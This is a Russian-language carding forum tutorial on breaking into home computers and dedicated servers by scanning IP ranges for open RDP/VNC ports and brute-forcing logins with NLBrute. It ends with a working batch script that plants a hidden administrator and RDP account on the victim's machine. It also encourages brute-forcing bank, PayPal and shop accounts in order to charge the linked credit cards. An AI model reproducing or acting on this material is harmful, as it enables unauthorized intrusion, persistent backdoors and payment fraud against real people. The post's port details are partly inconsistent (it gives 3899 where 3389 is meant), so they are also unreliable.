RDP & VNC & BRUTE

Carder

Professional
Messages
2,619
Reputation
9
Reaction score
1,726
Points
113
Всем привет, друзья кардеры!

Сегодня мы поговорим о бруте, взломе выделенных серверов и заработке на этом. Рассмотрим взлом с помощью различного софта.

Начнём с небольшой терминологии.

Брут (bruteforce) - подбор паролей полным перебором.

RDP (Remote Desktop Protocol) – специальный протокол, разработанный компанией Microsoft для удаленного управления ОС Windows (протокол удалённого рабочего стола). С помощью этого протокола идёт подключение к дедикам.

VNC (Virtual Network Computing) - Открытый протокол, это копирование экрана пользователя без блокирования, у него есть различные расширения. Если RDP создаёт отдельную сессию и регистрирует нас в системе, то VNC грубо говоря передаёт потоковое видео с экрана. Чаще используется для брута MAC OS. Дефолтный порт 5900.

Дедик - от английского слова "dedicated", что означает выделенный. Полное название - Dedicated Server,что означает выделенный сервер. Служат они для обработки данных, хранения различного материала, и т.д. Дедик это удалённый сервер (компьютер), который включен 24 часа в сутки. Так же, они имеют мощные сетевые интерфейсы и аппаратную конфигурацию.

Применение дедиков:

Применяют их например для брута, спама, флуда, ддоса. Для всех тех операций, которые требуют продолжительного включенного компьютера и его нагрузки.

Особенности дедиков & VNC

Так как брутим мы домашние компьютеры, то зачастую у них IP адреса чистые и не задроченные вбивами. Соответственно, дают они на порядок лучше, чем прокси, туннели, и прочий шлак.

Советую использовать это преимущество.

Что можно брутить и насколько актуально это направление?​

Так как большинство людей используют простые пароли, эти пароли можно подобрать простым перебором. Брутфорсу подвержены очень многие сервисы. Наиболее популярные в сфере кардинга это:
  • Банковские аккаунты
  • Walmart
  • eBay
  • PayPal
  • Farfetch
  • И многое другое...
Брутить можно практически что угодно. Нужен лишь хороший кодер, который напишет нужный брут под определённый сервис.

Имея брученные аккаунты, мы можем вбивать с привязанных к ним кредитных карт.

Так как у нас нет куков (cookies) и шоп считает что вы первый раз зашли с этой системы в этот аккаунт, он вам не доверяет. Нужно долго прогревать, в отличие от логов.

Если есть базы и софт, можно начинать работать с брутом, актуально.

Брут дедиков​

С дедиками обычно работают через службу удалённого рабочего стола (3899 порт). Для того чтобы подключится к удалённому рабочему столу нужно нажать сочетание клавиш win+r, написать mstsc.

7bf6ce699a55b12cb0035.png

В появившемся окне нужно вписать IP адрес и нажать подключиться. При подключении нас попросят ввести логин и пароль.

3e641613af7c100c739dd.png

Добыча дедиков

Весь процесс добычи дедиков состоит всего-лишь из двух этапов:

1- Сканирование диапазона на IP адреса с открытым 3899 (или любым другим) портом (уязвимость которая "позволяет сбрутить дедик").

2- Брут полученных IP адресов на указанные логины и пароли.

1 этап.​

Находим IP диапазоны. Нам нужно найти диапазоны IP адресов нужной нам страны. Найти можно в гугле по первым ссылкам.

Эти диапазоны влияют на геопозицию выделенного сервера. В диапазонах Бразилии вы не найдёте Русские сервера, поэтому, к их выбору нужно подойти основательно. (Выбирать Бразильские диапазоны (если вам нужна Бразилия)) :)

Длительность сканирования зависит от количества введённых вами диапазонов и мощности пк.

a20011d82efe7f1686427.png

пример диапазонов Москвы

2 этап.​

Сканируем IP диапазоны. VNC Scanner GUI. Эта программа нужна для поиска среди всех IP, IP с открытым портом (уязвимость!). Программа проста в использовании. Диапазоны сгружаем в большое левое окошко. Вписываем нужный нам порт. Самый используемый 3389, но также нам могут подойти 3390 и 3391 и многие другие. Единственный минус этой программы - «малозадачность». Мы можем искать в наших диапазонах только один открытый порт за один раз. Сканеров в сети масса.

e58a975b9d133e272e46a.png


3 этап.​

Брут просканированных IP адресов с открытым портом.

NLBrute - это программа подбирающая пароли к учетным записям. Программа, которая и будет брутить.

После окончания работы VNC Scanner’a нажимаем в сканере кнопку “Start Parser”. Все IP с открытыми портами спарсятся в текстовый файл, который мы указываем в бруте.

Переходим в NLBrute. Начнём с настройки программы.

da0aa0c78db75da3cafab.png

Servers - наши просканированные IP, сканером, с открытыми портами

Users - имена учёток (Например: admin, Administrator и т.д..), больше всего распространены Admin, admin, Administrator, administrator, можно использовать только их.

Passwords - пароли, которые будут перебираться для учётных записей, это могут быть и большие словари на миллионы строк, но от этого процесс замедляется.

a64367996a6286b96f8da.png


Далее выставляем порт который мы сканировали, количество потоков, которые потянет ваш ПК, и запускаем брут.

37be096d211086c5893c6.png

Ждём пока софт нам что-либо набрутит. Брутит долго, зависит от мощности пк и от словаря паролей. Может набрутить много гудов, а может и за сутки быть 0.

4 этап.​

Получаем данные в формате USER:pASSWORD.

Дедик сбручен, подключаемся.

928d10e34ba0c8f8e05e5.png

пример дедика

Перед нами следующая проблема: так как это домашний компьютер человека, хозяин может заметить нас.

Чтобы этого избежать, достаточно просто создать и запустить файл с расширением .bat следующего содержания:

Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user ВАШ_ЛОГИН ВАШ_ПАСС /add
net localgroup %AdmGroup% ВАШ_ЛОГИН /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" ВАШ_ЛОГИН /add
net accounts /maxpwage:unlimited
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ВАШ_ЛОГИН /t REG_DWORD /d 0 /f

Где, ВАШ_ЛОГИН и ВАШ_ПАРОЛЬ изменены на ваши данные. Достаточно перенести батник на компьютер жертвы и запустить, эффект мгновенный. Батник удаляется сам.

Вся эта процедура создаёт и скрывает учётную запись на компьютере жертвы.

5 этап.​

Поздравляю, вы научились брутить дедики и VNC. Вариантов реализации масса: вбивы, перепродажа, изучение...

Чтобы брутить остальное, уже нужен приватный самописный и базы (user:pass)

Брутить можно что угодно, читайте и познавайте новое.
 
Top